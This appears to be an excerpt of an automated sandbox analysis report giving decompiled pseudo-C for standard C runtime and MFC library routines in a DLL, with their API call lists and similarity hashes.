                                                                                                            						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
                                                                                                            						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
                                                                                                            						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
                                                                                                            						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
                                                                                                            						_push(_a16);
                                                                                                            						 *0x1004f3bc = _t46;
                                                                                                            						_push(_a12);
                                                                                                            						_t31 = E1001EB68(_t53, _a4, 0x110);
                                                                                                            						L23:
                                                                                                            						return _t31;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1001D2E7
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1001D2F3
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1001D2FF
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1001D30B
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1001D317
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1001D323
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                            • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                            • API String ID: 1228543026-3888057576
                                                                                                            • Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                                                            • Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
                                                                                                            • Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                                                            • Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10016994() {
                                                                                                            				intOrPtr _t20;
                                                                                                            				int _t21;
                                                                                                            				long _t24;
                                                                                                            				void* _t31;
                                                                                                            				void* _t51;
                                                                                                            				long _t52;
                                                                                                            				void* _t57;
                                                                                                            				signed int _t67;
                                                                                                            				void** _t69;
                                                                                                            				void* _t70;
                                                                                                            				void* _t72;
                                                                                                            				void* _t73;
                                                                                                            
                                                                                                            				_t70 = _t72 - 0x8c;
                                                                                                            				_t73 = _t72 - 0x10c;
                                                                                                            				_t20 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t52 =  *(_t70 + 0x94);
                                                                                                            				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
                                                                                                            				_t21 = 0;
                                                                                                            				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
                                                                                                            					_t21 = _t21 + 1;
                                                                                                            					if(_t21 < 0x13) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					break;
                                                                                                            				}
                                                                                                            				_t67 = _t21 << 3;
                                                                                                            				_t6 = _t67 + 0x1004cb88; // 0x28000000
                                                                                                            				if(_t52 ==  *_t6) {
                                                                                                            					_t21 =  *0x1004f3d4; // 0x0
                                                                                                            					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
                                                                                                            						_t17 = _t67 + 0x1004cb8c; // 0x10042328
                                                                                                            						_t69 = _t17;
                                                                                                            						_t24 = E10011820( *_t69);
                                                                                                            						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
                                                                                                            					} else {
                                                                                                            						if(_t52 != 0xfc) {
                                                                                                            							 *((char*)(_t70 + 0x84)) = 0;
                                                                                                            							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
                                                                                                            								E10017B90(_t70 - 0x80, "<program name unknown>");
                                                                                                            							}
                                                                                                            							_t63 = _t70 - 0x80;
                                                                                                            							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
                                                                                                            								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
                                                                                                            								_t73 = _t73 + 0x10;
                                                                                                            							}
                                                                                                            							_t31 = E10011820(_t63);
                                                                                                            							_t12 = _t67 + 0x1004cb8c; // 0x10042328
                                                                                                            							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
                                                                                                            							_pop(_t57);
                                                                                                            							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
                                                                                                            							_t51 = _t73;
                                                                                                            							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
                                                                                                            							E10017BA0(_t51, _t63);
                                                                                                            							E10017BA0(_t51, "\n\n");
                                                                                                            							_t15 = _t67 + 0x1004cb8c; // 0x10042328
                                                                                                            							E10017BA0(_t51,  *_t15);
                                                                                                            							_push(0x12010);
                                                                                                            							_push("Microsoft Visual C++ Runtime Library");
                                                                                                            							_push(_t51);
                                                                                                            							_t21 = E10019D1D();
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
                                                                                                            • _strlen.LIBCMT ref: 10016A35
                                                                                                            • _strlen.LIBCMT ref: 10016A44
                                                                                                            • _strncpy.LIBCMT ref: 10016A5B
                                                                                                            • _strlen.LIBCMT ref: 10016A64
                                                                                                            • _strlen.LIBCMT ref: 10016A71
                                                                                                            • _strlen.LIBCMT ref: 10016AD7
                                                                                                            • GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
                                                                                                            • WriteFile.KERNEL32(00000000), ref: 10016AE9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strlen$File$HandleModuleNameWrite_strncpy
                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                            • API String ID: 190417973-4022980321
                                                                                                            • Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                                                            • Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
                                                                                                            • Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                                                            • Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 70%
                                                                                                            			E10015384() {
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr _t7;
                                                                                                            				struct HINSTANCE__* _t9;
                                                                                                            				struct HINSTANCE__* _t11;
                                                                                                            				long _t12;
                                                                                                            				_Unknown_base(*)()* _t16;
                                                                                                            				void* _t22;
                                                                                                            				struct HINSTANCE__* _t26;
                                                                                                            				void* _t30;
                                                                                                            				struct HINSTANCE__* _t32;
                                                                                                            
                                                                                                            				if(E100138E5() != 0) {
                                                                                                            					_push(_t30);
                                                                                                            					_t26 = GetModuleHandleA("kernel32.dll");
                                                                                                            					__eflags = _t26;
                                                                                                            					if(_t26 != 0) {
                                                                                                            						_t30 = GetProcAddress;
                                                                                                            						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
                                                                                                            						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
                                                                                                            						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
                                                                                                            						_t16 = GetProcAddress(_t26, "FlsFree");
                                                                                                            						__eflags =  *0x1004f5e0;
                                                                                                            						 *0x1004f5e8 = _t16;
                                                                                                            						if( *0x1004f5e0 == 0) {
                                                                                                            							 *0x1004f5e0 = TlsGetValue;
                                                                                                            							 *0x1004f5e4 = TlsSetValue;
                                                                                                            							 *0x1004f5dc = 0x10015164;
                                                                                                            							 *0x1004f5e8 = TlsFree;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t7 =  *0x1004f5dc(E1001520E);
                                                                                                            					__eflags = _t7 - 0xffffffff;
                                                                                                            					 *0x1004c848 = _t7;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						L9:
                                                                                                            						E1001516D();
                                                                                                            						_t9 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            					} else {
                                                                                                            						_push(0x8c);
                                                                                                            						_push(1);
                                                                                                            						_t32 = E1001382A(_t22, 1, _t30, __eflags);
                                                                                                            						__eflags = _t32;
                                                                                                            						if(_t32 == 0) {
                                                                                                            							goto L9;
                                                                                                            						} else {
                                                                                                            							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
                                                                                                            							__eflags = _t11;
                                                                                                            							if(_t11 == 0) {
                                                                                                            								goto L9;
                                                                                                            							} else {
                                                                                                            								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
                                                                                                            								 *((intOrPtr*)(_t32 + 0x14)) = 1;
                                                                                                            								_t12 = GetCurrentThreadId();
                                                                                                            								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
                                                                                                            								 *_t32 = _t12;
                                                                                                            								_t9 = 1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t9;
                                                                                                            				} else {
                                                                                                            					E1001516D();
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
                                                                                                            • FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10015459
                                                                                                              • Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                                                            • API String ID: 2355849793-282957996
                                                                                                            • Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                                                            • Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
                                                                                                            • Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                                                            • Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 90%
                                                                                                            			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				int _v8;
                                                                                                            				int _v12;
                                                                                                            				int _v16;
                                                                                                            				intOrPtr* _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				char _v28;
                                                                                                            				signed int _v32;
                                                                                                            				signed int _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				intOrPtr _v44;
                                                                                                            				int _v48;
                                                                                                            				void* _v52;
                                                                                                            				struct tagRECT _v68;
                                                                                                            				struct tagRECT _v84;
                                                                                                            				struct tagRECT _v100;
                                                                                                            				struct HDWP__* _v132;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t188;
                                                                                                            				signed int _t190;
                                                                                                            				signed int _t192;
                                                                                                            				intOrPtr* _t198;
                                                                                                            				intOrPtr _t206;
                                                                                                            				int _t208;
                                                                                                            				signed int _t210;
                                                                                                            				signed int _t211;
                                                                                                            				signed int _t214;
                                                                                                            				signed int _t215;
                                                                                                            				signed int _t221;
                                                                                                            				void* _t225;
                                                                                                            				intOrPtr _t233;
                                                                                                            				intOrPtr _t234;
                                                                                                            				int _t243;
                                                                                                            				signed int _t251;
                                                                                                            				signed int _t256;
                                                                                                            				long _t263;
                                                                                                            				intOrPtr _t264;
                                                                                                            				int _t273;
                                                                                                            				signed int _t280;
                                                                                                            				signed int _t287;
                                                                                                            				intOrPtr* _t297;
                                                                                                            				intOrPtr _t302;
                                                                                                            				signed int _t310;
                                                                                                            				signed int _t312;
                                                                                                            				intOrPtr _t319;
                                                                                                            				signed int _t325;
                                                                                                            				intOrPtr _t326;
                                                                                                            				signed int _t329;
                                                                                                            				int _t334;
                                                                                                            				intOrPtr* _t341;
                                                                                                            
                                                                                                            				_t297 = __ecx;
                                                                                                            				E1002F49A( &_v28, _a8, _a12);
                                                                                                            				if(IsRectEmpty(_t297 + 0xac) != 0) {
                                                                                                            					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
                                                                                                            					_t188 = _v84.right - _v84.left;
                                                                                                            					_t302 = _v84.bottom - _v84.top;
                                                                                                            				} else {
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
                                                                                                            					_t188 = _v68.right - _v68.left;
                                                                                                            					_t302 = _v68.bottom - _v68.top;
                                                                                                            				}
                                                                                                            				_t334 = 0;
                                                                                                            				_v44 = _t188;
                                                                                                            				_v40 = _t302;
                                                                                                            				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
                                                                                                            					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
                                                                                                            				} else {
                                                                                                            					_v132 = 0;
                                                                                                            				}
                                                                                                            				_t190 =  *0x1004efa0; // 0x2
                                                                                                            				_v36 =  ~_t190;
                                                                                                            				_t192 =  *0x1004efa4; // 0x2
                                                                                                            				_v32 =  ~_t192;
                                                                                                            				_v16 = _t334;
                                                                                                            				_v12 = _t334;
                                                                                                            				_v8 = _t334;
                                                                                                            				if( *(_t297 + 0x9c) <= _t334) {
                                                                                                            					L72:
                                                                                                            					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
                                                                                                            						EndDeferWindowPos(_v132);
                                                                                                            					}
                                                                                                            					SetRectEmpty( &_v100);
                                                                                                            					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
                                                                                                            					if(_a8 == _t334 || _a12 == _t334) {
                                                                                                            						if(_v28 != _t334) {
                                                                                                            							_v28 = _v28 + _v100.left - _v100.right;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_a8 == _t334 || _a12 != _t334) {
                                                                                                            						if(_v24 != _t334) {
                                                                                                            							_v24 = _v24 + _v100.top - _v100.bottom;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t198 = _a4;
                                                                                                            					 *_t198 = _v28;
                                                                                                            					 *((intOrPtr*)(_t198 + 4)) = _v24;
                                                                                                            					return _t198;
                                                                                                            				} else {
                                                                                                            					do {
                                                                                                            						_t341 = E1002CE0B(_t297, _v8);
                                                                                                            						_v20 = _t341;
                                                                                                            						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
                                                                                                            						if(_t341 == _t334) {
                                                                                                            							if(_t206 != _t334) {
                                                                                                            								goto L71;
                                                                                                            							}
                                                                                                            							L58:
                                                                                                            							_t208 = _v16;
                                                                                                            							if(_t208 != _t334) {
                                                                                                            								if(_a12 == _t334) {
                                                                                                            									_t310 = _v36 + _t208 -  *0x1004efa0;
                                                                                                            									_v36 = _t310;
                                                                                                            									if(_v28 <= _t310) {
                                                                                                            										_v28 = _t310;
                                                                                                            									}
                                                                                                            									_t210 = _v32;
                                                                                                            									if(_v24 <= _t210) {
                                                                                                            										_v24 = _t210;
                                                                                                            									}
                                                                                                            									_t211 =  *0x1004efa4; // 0x2
                                                                                                            									_v32 =  ~_t211;
                                                                                                            								} else {
                                                                                                            									_t312 = _v32 + _t208 -  *0x1004efa4;
                                                                                                            									_t214 = _v36;
                                                                                                            									_v32 = _t312;
                                                                                                            									if(_v28 <= _t214) {
                                                                                                            										_v28 = _t214;
                                                                                                            									}
                                                                                                            									if(_v24 <= _t312) {
                                                                                                            										_v24 = _t312;
                                                                                                            									}
                                                                                                            									_t215 =  *0x1004efa0; // 0x2
                                                                                                            									_v36 =  ~_t215;
                                                                                                            								}
                                                                                                            								_v16 = _t334;
                                                                                                            							}
                                                                                                            							goto L71;
                                                                                                            						}
                                                                                                            						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
                                                                                                            							L51:
                                                                                                            							if(_v12 != _t334) {
                                                                                                            								goto L71;
                                                                                                            							}
                                                                                                            							L52:
                                                                                                            							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
                                                                                                            							goto L71;
                                                                                                            						}
                                                                                                            						_t221 =  *(_t341 + 0x7c);
                                                                                                            						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
                                                                                                            							asm("sbb eax, eax");
                                                                                                            							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
                                                                                                            						} else {
                                                                                                            							_t225 = 6;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
                                                                                                            						E100086B2( &_v68, _v36, _v32, _v52, _v48);
                                                                                                            						GetWindowRect( *(_t341 + 0x1c),  &_v84);
                                                                                                            						E10028E5A(_t297,  &_v84);
                                                                                                            						if(_a12 == _t334) {
                                                                                                            							_t233 = _v84.top;
                                                                                                            							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                                                            								OffsetRect( &_v68, _t334, _t233 - _v68.top);
                                                                                                            							}
                                                                                                            							_t234 = _v68.bottom;
                                                                                                            							_t319 = _v40;
                                                                                                            							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                                                            								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
                                                                                                            								_t256 = _v32;
                                                                                                            								if(_t325 > _t256) {
                                                                                                            									_t256 = _t325;
                                                                                                            								}
                                                                                                            								OffsetRect( &_v68, _t334, _t256 - _v68.top);
                                                                                                            							}
                                                                                                            							if(_v12 == _t334) {
                                                                                                            								if(_v68.top < _v40 -  *0x1004efa4) {
                                                                                                            									goto L44;
                                                                                                            								}
                                                                                                            								_t247 = _v8;
                                                                                                            								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
                                                                                                            									goto L44;
                                                                                                            								} else {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t251 =  *0x1004efa4; // 0x2
                                                                                                            								_v12 = _t334;
                                                                                                            								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
                                                                                                            								L44:
                                                                                                            								if(EqualRect( &_v68,  &_v84) == 0) {
                                                                                                            									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										_t341 = _v20;
                                                                                                            										_t334 = 0;
                                                                                                            									}
                                                                                                            									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
                                                                                                            								}
                                                                                                            								_v32 = _v68.top -  *0x1004efa4 + _v48;
                                                                                                            								_t243 = _v52;
                                                                                                            								if(_v16 > _t243) {
                                                                                                            									goto L52;
                                                                                                            								} else {
                                                                                                            									_v16 = _t243;
                                                                                                            									goto L51;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t263 = _v84.left;
                                                                                                            							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                                                            								OffsetRect( &_v68, _t263 - _v68.left, _t334);
                                                                                                            							}
                                                                                                            							_t264 = _v68.right;
                                                                                                            							_t326 = _v44;
                                                                                                            							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
                                                                                                            								L22:
                                                                                                            								if(_v12 == _t334) {
                                                                                                            									if(_v68.left < _v44 -  *0x1004efa0) {
                                                                                                            										L27:
                                                                                                            										if(EqualRect( &_v68,  &_v84) == 0) {
                                                                                                            											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												_t341 = _v20;
                                                                                                            												_t334 = 0;
                                                                                                            											}
                                                                                                            											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
                                                                                                            										}
                                                                                                            										_v36 = _v52 -  *0x1004efa0 + _v68.left;
                                                                                                            										_t273 = _v48;
                                                                                                            										if(_v16 <= _t273) {
                                                                                                            											_v16 = _t273;
                                                                                                            										}
                                                                                                            										goto L52;
                                                                                                            									}
                                                                                                            									_t277 = _v8;
                                                                                                            									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
                                                                                                            										goto L27;
                                                                                                            									} else {
                                                                                                            										L56:
                                                                                                            										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
                                                                                                            										_v12 = 1;
                                                                                                            										goto L58;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t280 =  *0x1004efa0; // 0x2
                                                                                                            								_v12 = _t334;
                                                                                                            								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
                                                                                                            								goto L27;
                                                                                                            							} else {
                                                                                                            								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
                                                                                                            								_t287 = _v36;
                                                                                                            								if(_t329 > _t287) {
                                                                                                            									_t287 = _t329;
                                                                                                            								}
                                                                                                            								OffsetRect( &_v68, _t287 - _v68.left, _t334);
                                                                                                            								goto L22;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L71:
                                                                                                            						_v8 = _v8 + 1;
                                                                                                            					} while (_v8 <  *(_t297 + 0x9c));
                                                                                                            					goto L72;
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x1002d676
                                                                                                            0x1002d67b
                                                                                                            0x00000000
                                                                                                            0x1002d67b
                                                                                                            0x1002d4be
                                                                                                            0x1002d48e
                                                                                                            0x1002d4a0
                                                                                                            0x1002d4a3
                                                                                                            0x00000000
                                                                                                            0x1002d466
                                                                                                            0x1002d46f
                                                                                                            0x1002d471
                                                                                                            0x1002d476
                                                                                                            0x1002d478
                                                                                                            0x1002d478
                                                                                                            0x1002d483
                                                                                                            0x00000000
                                                                                                            0x1002d483
                                                                                                            0x1002d45c
                                                                                                            0x1002d6eb
                                                                                                            0x1002d6eb
                                                                                                            0x1002d6f1
                                                                                                            0x00000000
                                                                                                            0x1002d397

                                                                                                            APIs
                                                                                                            • IsRectEmpty.USER32 ref: 1002D2FA
                                                                                                            • GetClientRect.USER32 ref: 1002D338
                                                                                                            • BeginDeferWindowPos.USER32 ref: 1002D365
                                                                                                            • GetWindowRect.USER32 ref: 1002D41B
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 1002D44E
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 1002D483
                                                                                                            • OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
                                                                                                            • EqualRect.USER32 ref: 1002D4DD
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D559
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D58E
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
                                                                                                            • EqualRect.USER32 ref: 1002D5C0
                                                                                                            • EndDeferWindowPos.USER32(?), ref: 1002D70D
                                                                                                            • SetRectEmpty.USER32(?), ref: 1002D717
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160784657-0
                                                                                                            • Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                                                            • Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
                                                                                                            • Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                                                            • Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                                                            				signed int _t119;
                                                                                                            				intOrPtr _t120;
                                                                                                            				int _t122;
                                                                                                            				char* _t125;
                                                                                                            				int _t132;
                                                                                                            				signed int _t134;
                                                                                                            				int _t137;
                                                                                                            				int _t138;
                                                                                                            				short* _t160;
                                                                                                            				short* _t163;
                                                                                                            				int _t164;
                                                                                                            				signed int _t165;
                                                                                                            				long _t169;
                                                                                                            				signed int _t172;
                                                                                                            				int _t181;
                                                                                                            				char* _t183;
                                                                                                            				int _t184;
                                                                                                            				signed int _t186;
                                                                                                            				int _t187;
                                                                                                            				int _t190;
                                                                                                            				void* _t192;
                                                                                                            				short* _t193;
                                                                                                            				char* _t195;
                                                                                                            				char* _t196;
                                                                                                            				signed int _t199;
                                                                                                            
                                                                                                            				_t185 = __esi;
                                                                                                            				_push(0x38);
                                                                                                            				_push(0x10042708);
